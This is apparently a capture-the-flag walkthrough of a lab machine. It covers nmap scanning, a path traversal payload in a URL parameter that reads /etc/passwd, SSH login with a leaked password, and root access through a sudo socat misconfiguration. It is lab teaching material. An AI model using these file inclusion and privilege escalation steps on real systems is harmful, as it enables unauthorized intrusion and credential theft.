Nmap scan
kali@kali:~$ nmap -T4 -A 10.10.216.80
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-14 11:14 EST
Nmap scan report for 10.10.216.80
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
| 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-title: My blog
1030/tcp filtered iad1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.65 seconds
Head to 10.10.216.80.
Notice the url http://10.10.216.80/article?name=lfiattack .
We can do a lfi attack and look into the /etc/passwd file by adding the following after the equal sign:
../../../../../etc/passwdWhat we are doing here is to go up the parent directory with the ../ and eventually hit the root directory and get the /etc/passwd file.
Below we can see that we are able to retrieved the /etc/passwd file and render it on the web browser.
You can view page source to have a better view of the file.
Notice there is a commented line which show the password:
#falconfeastXXXXXXXXXI have blocked out the password.
kali@kali:~$ ssh falconfeast@10.10.216.80
The authenticity of host '10.10.216.80 (10.10.216.80)' can't be established.
ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.216.80' (ECDSA) to the list of known hosts.
falconfeast@10.10.216.80's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantageSystem information as of Sat Nov 14 22:26:33 IST 2020System load: 0.01 Processes: 85
Usage of /: 35.2% of 9.78GB Users logged in: 0
Memory usage: 65% IP address for eth0: 10.10.216.80
Swap usage: 0%* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
3 packages can be updated.
3 updates are security updates.
Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107
falconfeast@inclusion:~$
Next we can easily get the first user flag.
Next, we need to escalate our privilage to
Using the command: sudo -l we can see what commands our current user can run as root.
falconfeast@inclusion:/usr/bin$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser falconfeast may run the following commands on inclusion:
(root) NOPASSWD: /usr/bin/socat
From here we can run the /usr/bin/socat as root.
A simple google search leads me to GTFOBins about socat.
We can test out by running the command given above.
Here we rooted the system and got our root flag!.
